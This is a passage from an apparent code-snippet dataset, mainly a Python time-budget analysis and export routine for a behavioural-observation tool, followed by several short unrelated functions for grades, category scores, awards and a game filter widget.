len(all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(\n all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(\n statistics.mean(all_event_interdurations), 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n else: # no modifiers\n\n if POINT in self.eventType(behavior).upper():\n\n # if len(selectedObservations) > 1:\n cursor.execute(\n \"SELECT occurence,observation FROM events WHERE subject = ? AND code = ? ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n\n if len(selectedObservations) == 1:\n new_rows = []\n for occurence, observation in rows:\n new_occurence = max(float(plot_parameters[\"start time\"]), occurence)\n new_occurence = min(new_occurence, float(plot_parameters[\"end time\"]))\n new_rows.append([new_occurence, observation])\n rows = list(new_rows)\n\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(statistics.stdev(all_event_interdurations),\n 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n\n cursor.execute(\n \"SELECT occurence, observation FROM events WHERE subject = ? AND code = ? ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]: # include behaviors without events\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": \"-\", \"duration\": 0, \"duration_mean\": 0,\n \"duration_stdev\": \"NA\", \"number\": 0, \"inter_duration_mean\": \"-\",\n \"inter_duration_stdev\": \"-\"})\n continue\n\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior, \"modifiers\": \"NA\",\n \"duration\": UNPAIRED, \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\"end time\"] and \\\n plot_parameters[\"start time\"] <= rows[idx + 1][0] <= plot_parameters[\n \"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations), 3) if len(\n all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n out += out_cat\n\n if by_category: # and flagCategories:\n\n for behav in out_cat:\n\n try:\n category = [self.pj[ETHOGRAM][x][\"category\"] for x in self.pj[ETHOGRAM] if\n \"category\" in self.pj[ETHOGRAM][x] and self.pj[ETHOGRAM][x][\"code\"] == behav[\n 'behavior']][0]\n except:\n category = \"\"\n\n if category in categories[subject]:\n if behav[\"duration\"] not in [\"-\", \"NA\"] and categories[subject][category][\n \"duration\"] != \"-\":\n categories[subject][category][\"duration\"] += behav[\"duration\"]\n else:\n categories[subject][category][\"duration\"] = \"-\"\n categories[subject][category][\"number\"] += behav[\"number\"]\n else:\n categories[subject][category] = {\"duration\": behav[\"duration\"], \"number\": behav[\"number\"]}\n\n out_sorted = []\n for subject in plot_parameters[\"selected subjects\"]:\n for behavior in plot_parameters[\"selected behaviors\"]:\n for row in out:\n if row[\"subject\"] == subject and row[\"behavior\"] == behavior:\n out_sorted.append(row)\n\n ### http://stackoverflow.com/questions/673867/python-arbitrary-order-by\n return out_sorted, categories\n\n def default_value(behav, param):\n \"\"\"\n return value for duration in case of point event\n \"\"\"\n default_value_ = 0\n if ({self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behav} == {\"Point event\"}\n and param in [\"duration\"]):\n default_value_ = \"-\"\n return default_value_\n\n def init_behav_modif():\n \"\"\"\n initialize dictionary with subject, behaviors and modifiers\n \"\"\"\n behaviors = {}\n for subj in plot_parameters[\"selected subjects\"]:\n behaviors[subj] = {}\n for behav_modif in distinct_behav_modif:\n behav, modif = behav_modif\n if behav not in behaviors[subj]:\n behaviors[subj][behav] = {}\n if not plot_parameters[\"include modifiers\"]:\n for param in parameters:\n behaviors[subj][behav][param[0]] = default_value(behav, param[0])\n\n if plot_parameters[\"include modifiers\"]:\n behaviors[subj][behav][modif] = {}\n for param in parameters:\n behaviors[subj][behav][modif][param[0]] = default_value(behav, param[0])\n\n return behaviors\n\n result, selectedObservations = self.selectObservations(MULTIPLE)\n if not selectedObservations:\n return\n\n # check if state events are paired\n out = \"\"\n not_paired_obs_list = []\n for obsId in selectedObservations:\n r, msg = project_functions.check_state_events_obs(obsId, self.pj[ETHOGRAM],\n self.pj[OBSERVATIONS][obsId], self.timeFormat)\n\n if not r:\n out += \"Observation: <strong>{obsId}</strong><br>{msg}<br>\".format(obsId=obsId, msg=msg)\n not_paired_obs_list.append(obsId)\n\n if out:\n out = \"Some observations have UNPAIRED state events<br><br>\" + out\n self.results = dialog.Results_dialog()\n self.results.setWindowTitle(programName + \" - Check selected observations\")\n self.results.ptText.setReadOnly(True)\n self.results.ptText.appendHtml(out)\n self.results.pbSave.setVisible(False)\n self.results.pbCancel.setVisible(True)\n\n if not self.results.exec_():\n return\n\n flagGroup = False\n if len(selectedObservations) > 1 and mode != \"synthetic\":\n flagGroup = dialog.MessageDialog(programName, \"Group observations in one time budget analysis?\",\n [YES, NO]) == YES\n\n '''\n # check if state events are paired\n out = \"\"\n for obsId in selectedObservations:\n r, msg = project_functions.check_state_events_obs(obsId, self.pj[ETHOGRAM],\n self.pj[OBSERVATIONS][obsId],\n self.timeFormat)\n if not r:\n out += \"Observation: <strong>{obsId}</strong><br>{msg}<br>\".format(obsId=obsId, msg=msg)\n if out:\n self.results = dialog.ResultsWidget()\n self.results.setWindowTitle(programName + \" - Check selected observations\")\n self.results.ptText.setReadOnly(True)\n self.results.ptText.appendHtml(out)\n self.results.show()\n '''\n\n selectedObsTotalMediaLength = Decimal(\"0.0\")\n max_obs_length = 0\n for obsId in selectedObservations:\n obs_length = project_functions.observation_total_length(self.pj[OBSERVATIONS][obsId])\n\n logging.debug(\"media length for {0}: {1}\".format(obsId, obs_length))\n\n if obs_length in [0, -1]:\n selectedObsTotalMediaLength = -1\n break\n max_obs_length = max(max_obs_length, obs_length)\n\n selectedObsTotalMediaLength += obs_length\n\n # an observation media length is not available\n if selectedObsTotalMediaLength == -1:\n # propose to user to use max event time\n if dialog.MessageDialog(programName,\n \"A media length is not available.<br>Use last event time as media length?\",\n [YES, NO]) == YES:\n maxTime = 0 # max length for all events all subjects\n for obsId in selectedObservations:\n if self.pj[OBSERVATIONS][obsId][EVENTS]:\n maxTime += max(self.pj[OBSERVATIONS][obsId][EVENTS])[0]\n logging.debug(\"max time all events all subjects: {}\".format(maxTime))\n selectedObsTotalMediaLength = maxTime\n else:\n selectedObsTotalMediaLength = 0\n\n logging.debug(\"selectedObsTotalMediaLength: {}\".format(selectedObsTotalMediaLength))\n\n if mode in [\"by_behavior\", \"by_category\"]:\n if len(selectedObservations) > 1:\n plot_parameters = self.choose_obs_subj_behav_category(selectedObservations,\n maxTime=max_obs_length,\n by_category=(mode == \"by_category\"))\n else:\n plot_parameters = self.choose_obs_subj_behav_category(selectedObservations,\n maxTime=selectedObsTotalMediaLength,\n by_category=(mode == \"by_category\"))\n\n if mode == \"synthetic\":\n plot_parameters = self.choose_obs_subj_behav_category(selectedObservations,\n maxTime=max_obs_length,\n flagShowExcludeBehaviorsWoEvents=False,\n by_category=False)\n\n if not plot_parameters[\"selected subjects\"] or not plot_parameters[\"selected behaviors\"]:\n return\n\n # check if time_budget window must be used\n if mode in [\"by_behavior\", \"by_category\"] and (flagGroup or len(selectedObservations) == 1):\n\n cursor = db_functions.load_events_in_db(self.pj, plot_parameters[\"selected subjects\"], selectedObservations,\n plot_parameters[\"selected behaviors\"])\n\n total_observation_time = 0\n for obsId in selectedObservations:\n\n obs_length = project_functions.observation_total_length(self.pj[OBSERVATIONS][obsId])\n\n if obs_length == -1:\n obs_length = 0\n\n if plot_parameters[\"time\"] == TIME_FULL_OBS:\n min_time = float(0)\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_EVENTS:\n try:\n min_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][0][0])\n except:\n min_time = float(0)\n try:\n max_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][-1][0])\n except:\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_ARBITRARY_INTERVAL:\n min_time = float(plot_parameters[\"start time\"])\n max_time = float(plot_parameters[\"end time\"])\n\n # check intervals\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if POINT in self.eventType(behav).upper():\n continue\n # extract modifiers\n\n cursor.execute(\n \"SELECT distinct modifiers FROM events WHERE observation = ? AND subject = ? AND code = ?\",\n (obsId, subj, behav))\n distinct_modifiers = list(cursor.fetchall())\n\n logging.debug(\"distinct_modifiers: {}\".format(distinct_modifiers))\n\n for modifier in distinct_modifiers:\n\n logging.debug(\"modifier #{}#\".format(modifier[0]))\n\n if len(cursor.execute(\n \"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? AND occurence < ?\",\n (obsId, subj, behav, modifier[0], min_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], min_time))\n\n if len(cursor.execute(\n \"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? AND occurence > ?\",\n (obsId, subj, behav, modifier[0], max_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], max_time))\n try:\n cursor.execute(\"COMMIT\")\n except:\n pass\n\n total_observation_time += (max_time - min_time)\n\n cursor.execute(\"DELETE FROM events WHERE observation = ? AND (occurence < ? OR occurence > ?)\",\n (obsId, min_time, max_time))\n\n out, categories = time_budget_analysis(cursor, plot_parameters, by_category=(mode == \"by_category\"))\n\n # widget for results visualization\n self.tb = timeBudgetResults(logging.getLogger().getEffectiveLevel(), self.pj)\n\n # observations list\n self.tb.label.setText(\"Selected observations\")\n for obs in selectedObservations:\n self.tb.lw.addItem(obs)\n\n # media length\n if len(selectedObservations) > 1:\n if total_observation_time:\n if self.timeFormat == HHMMSS:\n self.tb.lbTotalObservedTime.setText(\n \"Total observation length: {}\".format(seconds2time(total_observation_time)))\n if self.timeFormat == S:\n self.tb.lbTotalObservedTime.setText(\n \"Total observation length: {:0.3f}\".format(float(total_observation_time)))\n else:\n self.tb.lbTotalObservedTime.setText(\"Total observation length: not available\")\n else:\n if self.timeFormat == HHMMSS:\n self.tb.lbTotalObservedTime.setText(\n \"Analysis from {} to {}\".format(seconds2time(min_time), seconds2time(max_time)))\n if self.timeFormat == S:\n self.tb.lbTotalObservedTime.setText(\n \"Analysis from {:0.3f} to {:0.3f} s\".format(float(min_time), float(max_time)))\n\n if mode == \"by_behavior\":\n\n tb_fields = [\"Subject\", \"Behavior\", \"Modifiers\", \"Total number\", \"Total duration (s)\",\n \"Duration mean (s)\", \"Duration std dev\", \"inter-event intervals mean (s)\",\n \"inter-event intervals std dev\", \"% of total length\"]\n\n fields = [\"subject\", \"behavior\", \"modifiers\", \"number\", \"duration\", \"duration_mean\", \"duration_stdev\",\n \"inter_duration_mean\", \"inter_duration_stdev\"]\n self.tb.twTB.setColumnCount(len(tb_fields))\n self.tb.twTB.setHorizontalHeaderLabels(tb_fields)\n\n for row in out:\n self.tb.twTB.setRowCount(self.tb.twTB.rowCount() + 1)\n column = 0\n for field in fields:\n item = QTableWidgetItem(str(row[field]).replace(\" ()\", \"\"))\n # no modif allowed\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n column += 1\n\n # % of total time\n if row[\"duration\"] not in [\"NA\", \"-\", UNPAIRED, 0] and selectedObsTotalMediaLength:\n item = QTableWidgetItem(str(round(row[\"duration\"] / float(total_observation_time) * 100, 1)))\n else:\n item = QTableWidgetItem(\"NA\")\n\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n if mode == \"by_category\":\n tb_fields = [\"Subject\", \"Category\", \"Total number\", \"Total duration (s)\"]\n fields = [\"number\", \"duration\"]\n self.tb.twTB.setColumnCount(len(tb_fields))\n self.tb.twTB.setHorizontalHeaderLabels(tb_fields)\n\n for subject in categories:\n\n for category in categories[subject]:\n\n self.tb.twTB.setRowCount(self.tb.twTB.rowCount() + 1)\n\n column = 0\n item = QTableWidgetItem(subject)\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n column = 1\n if category == \"\":\n item = QTableWidgetItem(\"No category\")\n else:\n item = QTableWidgetItem(category)\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n for field in fields:\n column += 1\n item = QTableWidgetItem(str(categories[subject][category][field]))\n item.setFlags(Qt.ItemIsEnabled)\n item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n self.tb.twTB.resizeColumnsToContents()\n\n self.tb.show()\n\n if mode in [\"by_behavior\", \"by_category\"] and (\n not flagGroup and len(selectedObservations) > 1) or mode == \"synthetic\":\n\n if mode in [\"by_behavior\", \"by_category\"]:\n items = (\"Tab Separated Values (*.tsv)\",\n \"Comma separated values (*.csv)\",\n \"OpenDocument Spreadsheet (*.ods)\",\n \"OpenDocument Workbook (*.ods)\",\n \"Microsoft Excel Spreadsheet (*.xlsx)\",\n \"Microsoft Excel Workbook (*.xlsx)\",\n \"HTML (*.html)\",\n \"Legacy Microsoft Excel Spreadsheet (*.xls)\")\n\n formats = [\"tsv\", \"csv\", \"od spreadsheet\", \"od workbook\", \"xlsx spreadsheet\", \"xlsx workbook\", \"html\",\n \"xls legacy\"]\n\n item, ok = QInputDialog.getItem(self, \"Time budget analysis format\", \"Available formats\", items, 0,\n False)\n if not ok:\n return\n\n outputFormat = formats[items.index(item)]\n extension = re.sub(\".* \\(\\*\\.\", \"\", item)[:-1]\n\n flagWorkBook = False\n\n if mode in [\"by_behavior\", \"by_category\"] and \"workbook\" in outputFormat:\n workbook = tablib.Databook()\n flagWorkBook = True\n if \"xls\" in outputFormat:\n filters = \"Microsoft Excel Workbook *.xlsx (*.xlsx);;All files (*)\"\n if \"od\" in outputFormat:\n filters = \"Open Document Workbook *.ods (*.ods);;All files (*)\"\n\n if QT_VERSION_STR[0] == \"4\":\n WBfileName, filter_ = QFileDialog(self).getSaveFileNameAndFilter(self, \"Save Time budget analysis\",\n \"\", filters)\n else:\n WBfileName, filter_ = QFileDialog(self).getSaveFileName(self, \"Save Time budget analysis\", \"\",\n filters)\n if not WBfileName:\n return\n\n if mode in [\"by_behavior\", \"by_category\"] and \"workbook\" not in outputFormat: # not workbook\n exportDir = QFileDialog(self).getExistingDirectory(self,\n \"Choose a directory to save the time budget analysis\",\n os.path.expanduser(\"~\"),\n options=QFileDialog.ShowDirsOnly)\n if not exportDir:\n return\n\n if mode == \"synthetic\":\n\n formats_str = (\"Tab Separated Values *.txt, *.tsv (*.txt *.tsv);;\"\n \"Comma Separated Values *.txt *.csv (*.txt *.csv);;\"\n \"Open Document Spreadsheet *.ods (*.ods);;\"\n \"Microsoft Excel Spreadsheet *.xlsx (*.xlsx);;\"\n # \"Pandas dataframe (*.df);;\"\n \"Legacy Microsoft Excel Spreadsheet *.xls (*.xls);;\"\n \"HTML *.html (*.html);;\"\n \"All files (*)\")\n\n while True:\n if QT_VERSION_STR[0] == \"4\":\n fileName, filter_ = QFileDialog(self).getSaveFileNameAndFilter(self, \"Save Time budget report\",\n \"\", formats_str)\n else:\n fileName, filter_ = QFileDialog(self).getSaveFileName(self, \"Save Time budget report\", \"\",\n formats_str)\n\n if not fileName:\n return\n\n extension = \"\"\n availableFormats = (\n \"tsv\", \"csv\", \"ods\", \"xlsx)\", \"xls)\", \"html\") # ) is added to distinguish between xls and xlsx\n for fileExtension in availableFormats:\n if fileExtension in filter_:\n extension = fileExtension.replace(\")\", \"\")\n if not extension:\n QMessageBox.warning(self, programName, \"Choose a file format\",\n QMessageBox.Ok | QMessageBox.Default, QMessageBox.NoButton)\n else:\n break\n\n data_report = tablib.Dataset()\n data_report.title = \"Synthetic time budget\"\n\n parameters = [[\"duration\", \"Total duration\"], [\"number\", \"Number of occurrences\"]]\n\n cursor = db_functions.load_events_in_db(self.pj, plot_parameters[\"selected subjects\"],\n selectedObservations, plot_parameters[\"selected behaviors\"])\n\n cursor.execute(\"SELECT distinct code, modifiers FROM events WHERE subject in ({})\".format(\n \",\".join(\"?\" * len(plot_parameters[\"selected subjects\"]))),\n (plot_parameters[\"selected subjects\"]))\n\n distinct_behav_modif = [[rows[\"code\"], rows[\"modifiers\"]] for rows in cursor.fetchall()]\n\n # add selected behaviors that are not observed\n for behav in plot_parameters[\"selected behaviors\"]:\n if [x for x in distinct_behav_modif if x[0] == behav] == []:\n distinct_behav_modif.append([behav, \"-\"])\n\n behaviors = init_behav_modif()\n\n subj_header, behav_header, modif_header, param_header = [\"\", \"\"], [\"\", \"\"], [\"\", \"\"], [\"\",\n \"Total length (s)\"]\n # subj_header, behav_header, modif_header, param_header = [\"\"], [\"\"], [\"\"], [\"\"]\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if not plot_parameters[\"include modifiers\"]:\n for param in parameters:\n subj_header.append(subj)\n behav_header.append(behav)\n param_header.append(param[1])\n\n if plot_parameters[\"include modifiers\"]:\n for modif in sorted(list(behaviors[subj][behav].keys())):\n for param in parameters:\n subj_header.append(subj)\n behav_header.append(behav)\n modif_header.append(modif)\n param_header.append(param[1])\n\n data_report.append(subj_header)\n data_report.append(behav_header)\n if plot_parameters[\"include modifiers\"]:\n data_report.append(modif_header)\n data_report.append(param_header)\n\n if mode == \"by_behavior\":\n fields = [\"subject\", \"behavior\", \"modifiers\", \"number\",\n \"duration\", \"duration_mean\", \"duration_stdev\",\n \"inter_duration_mean\", \"inter_duration_stdev\"]\n\n if mode == \"by_category\":\n fields = [\"subject\", \"category\", \"number\", \"duration\"]\n\n for obsId in selectedObservations:\n\n cursor = db_functions.load_events_in_db(self.pj, plot_parameters[\"selected subjects\"], [obsId],\n plot_parameters[\"selected behaviors\"])\n\n obs_length = project_functions.observation_total_length(self.pj[OBSERVATIONS][obsId])\n\n if obs_length == -1:\n obs_length = 0\n\n if plot_parameters[\"time\"] == TIME_FULL_OBS:\n min_time = float(0)\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_EVENTS:\n try:\n min_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][0][0])\n except:\n min_time = float(0)\n try:\n max_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][-1][0])\n except:\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_ARBITRARY_INTERVAL:\n min_time = float(plot_parameters[\"start time\"])\n max_time = float(plot_parameters[\"end time\"])\n\n # check intervals\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if POINT in self.eventType(behav).upper():\n continue\n # extract modifiers\n # if plot_parameters[\"include modifiers\"]:\n\n cursor.execute(\n \"SELECT distinct modifiers FROM events WHERE observation = ? AND subject = ? AND code = ?\",\n (obsId, subj, behav))\n distinct_modifiers = list(cursor.fetchall())\n\n for modifier in distinct_modifiers:\n\n if len(cursor.execute(\n \"\"\"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? AND occurence < ?\"\"\",\n (obsId, subj, behav, modifier[0], min_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], min_time))\n if len(cursor.execute(\n \"\"\"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? AND occurence > ?\"\"\",\n (obsId, subj, behav, modifier[0], max_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], max_time))\n try:\n cursor.execute(\"COMMIT\")\n except:\n pass\n\n cursor.execute(\"\"\"DELETE FROM events WHERE observation = ? AND (occurence < ? OR occurence > ?)\"\"\",\n (obsId, min_time, max_time))\n\n out, categories = time_budget_analysis(cursor, plot_parameters, by_category=(mode == \"by_category\"))\n\n if mode == \"synthetic\":\n\n behaviors = init_behav_modif()\n\n for element in out:\n for param in parameters:\n if not plot_parameters[\"include modifiers\"]:\n try:\n behaviors[element[\"subject\"]][element[\"behavior\"]][param[0]] = element[param[0]]\n except:\n pass\n if plot_parameters[\"include modifiers\"]:\n try:\n behaviors[element[\"subject\"]][element[\"behavior\"]][element[\"modifiers\"]][param[0]] = \\\n element[param[0]]\n except:\n pass\n\n columns = []\n columns.append(obsId)\n columns.append(\"{:0.3f}\".format(max_time - min_time))\n # columns.append([obsId])\n\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if not plot_parameters[\"include modifiers\"]:\n for param in parameters:\n columns.append(behaviors[subj][behav][param[0]])\n if plot_parameters[\"include modifiers\"]:\n for modif in sorted(list(behaviors[subj][behav].keys())):\n for param in parameters:\n columns.append(behaviors[subj][behav][modif][param[0]])\n\n data_report.append(columns)\n\n if mode in [\"by_behavior\", \"by_category\"]:\n rows = []\n # observation id\n rows.append([\"Observation id\", obsId])\n rows.append([\"\"])\n\n labels = [\"Independent variables\"]\n values = [\"\"]\n if INDEPENDENT_VARIABLES in self.pj and self.pj[INDEPENDENT_VARIABLES]:\n for idx in self.pj[INDEPENDENT_VARIABLES]:\n labels.append(self.pj[INDEPENDENT_VARIABLES][idx][\"label\"])\n if (INDEPENDENT_VARIABLES in self.pj[OBSERVATIONS][obsId]\n and self.pj[INDEPENDENT_VARIABLES][idx][\"label\"] in self.pj[OBSERVATIONS][obsId][\n INDEPENDENT_VARIABLES]):\n values.append(self.pj[OBSERVATIONS][obsId][INDEPENDENT_VARIABLES][\n self.pj[INDEPENDENT_VARIABLES][idx][\"label\"]])\n rows.append(labels)\n rows.append(values)\n rows.append([\"\"])\n\n rows.append(\n [\"Analysis from\", \"{:0.3f}\".format(float(min_time)), \"to\", \"{:0.3f}\".format(float(max_time))])\n rows.append([\"Total length (s)\", \"{:0.3f}\".format(float(max_time - min_time))])\n rows.append([\"\"])\n rows.append([\"Time budget\"])\n\n if mode == \"by_behavior\":\n\n rows.append(fields + [\"% of total length\"])\n # data.headers = fields + [\"% of total media length\"]\n\n for row in out:\n values = []\n for field in fields:\n values.append(str(row[field]).replace(\" ()\", \"\"))\n\n # % of total time\n if row[\"duration\"] not in [\"NA\", \"-\", UNPAIRED, 0] and selectedObsTotalMediaLength:\n # if row[\"duration\"] != \"-\" and row[\"duration\"] != 0 and row[\"duration\"] != UNPAIRED and selectedObsTotalMediaLength:\n values.append(round(row[\"duration\"] / float(max_time - min_time) * 100, 1))\n '''\n if len(selectedObservations) > 1:\n values.append(round(row[\"duration\"] / float(selectedObsTotalMediaLength) * 100, 1))\n else:\n values.append(round(row[\"duration\"] / float(max_time - min_time) * 100, 1))\n '''\n else:\n values.append(\"-\")\n\n rows.append(values)\n\n if mode == \"by_category\":\n rows.append = fields\n # data.headers = fields # + [\"% of total media length\"]\n for subject in categories:\n\n for category in categories[subject]:\n values = []\n values.append(subject)\n if category == \"\":\n values.append(\"No category\")\n else:\n values.append(category)\n\n values.append(categories[subject][category][\"number\"])\n values.append(categories[subject][category][\"duration\"])\n\n rows.append(values)\n\n data = tablib.Dataset()\n data.title = obsId\n for row in rows:\n data.append(complete(row, max([len(r) for r in rows])))\n\n if \"xls\" in outputFormat:\n for forbidden_char in EXCEL_FORBIDDEN_CHARACTERS:\n data.title = data.title.replace(forbidden_char, \" \")\n\n if flagWorkBook:\n for forbidden_char in EXCEL_FORBIDDEN_CHARACTERS:\n data.title = data.title.replace(forbidden_char, \" \")\n if \"xls\" in outputFormat:\n if len(data.title) > 31:\n data.title = data.title[:31]\n workbook.add_sheet(data)\n\n else:\n\n fileName = exportDir + os.sep + safeFileName(obsId) + \".\" + extension\n\n if outputFormat in [\"tsv\", \"csv\", \"html\"]:\n with open(fileName, \"wb\") as f:\n f.write(str.encode(data.export(outputFormat)))\n\n if outputFormat == \"od spreadsheet\":\n with open(fileName, \"wb\") as f:\n f.write(data.ods)\n\n if outputFormat == \"xlsx spreadsheet\":\n with open(fileName, \"wb\") as f:\n f.write(data.xlsx)\n\n if outputFormat == \"xls legacy\":\n if len(data.title) > 31:\n data.title = data.title[:31]\n QMessageBox.warning(None, programName, (\n \"The worksheet name <b>{0}</b> was shortened to <b>{1}</b> due to XLS format limitations.\\n\"\n \"The limit on worksheet name length is 31 characters\").format(obsId, data.title),\n QMessageBox.Ok | QMessageBox.Default, QMessageBox.NoButton)\n\n with open(fileName, \"wb\") as f:\n f.write(data.xls)\n\n if mode == \"synthetic\":\n if extension in [\"tsv\", \"csv\", \"html\"]:\n with open(fileName, \"wb\") as f:\n f.write(str.encode(data_report.export(extension)))\n if extension in [\"ods\", \"xlsx\", \"xls\"]:\n with open(fileName, \"wb\") as f:\n f.write(data_report.export(extension))\n\n if mode in [\"by_behavior\", \"by_category\"] and flagWorkBook:\n if \"xls\" in outputFormat:\n with open(WBfileName, \"wb\") as f:\n f.write(workbook.xlsx)\n if \"od\" in outputFormat:\n with open(WBfileName, \"wb\") as f:\n f.write(workbook.ods)", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + \"\\n\")", "def PrintCategoryScore(Cat):\r\n print()\r\n print(\"########## Individual Category Results ##########\")\r\n for i in range(len(Cat)): # prints out the results per category \r\n print()\r\n print(Cat[i])\r\n print(CategoryScore(Cat[i]))\r\n print()\r\n return print(\"----- End of Individuals Category Results -----\")", "def get_award_list(actioncluster):\n award_queryset = (ActionClusterAward.objects\n .select_related('award').filter(actioncluster=actioncluster))\n return [a.award for a in award_queryset]", "def extract_abilities(self):\n titleLabel = QLabel(\"Ability Scores\")\n titleLabel.setStyleSheet('font: 20pt \"Imprint MT Shadow\"; color: #ffffff;')\n grid = QGridLayout()\n self.filterVbox.addWidget(titleLabel, alignment=Qt.AlignCenter)\n self.filterVbox.addLayout(grid)\n\n counter = 0\n abilities = [\"Strength\", \"Dexterity\", \"Constitution\", \"Intelligence\", \"Wisdom\", \"Charisma\"]\n for [minVal, maxVal] in self.filters[\"Abilities\"].values():\n nextLabel = QLabel(f\"{abilities[counter]} - Between {str(minVal)} & {str(maxVal)}\")\n nextLabel.setStyleSheet('font: 12pt \"Times New Roman\"; color: rgb(188, 189, 177);')\n grid.addWidget(nextLabel, math.floor(counter / 2), counter % 2, alignment=Qt.AlignCenter)\n counter += 1", "def print_tod_accomplishments(accomplishments):\n print(Colors.BLUE + \"Accomplishments from Tod:\" + Colors.NORMAL)\n for accomplishment in accomplishments:\n print(Colors.CYAN + '* ' + 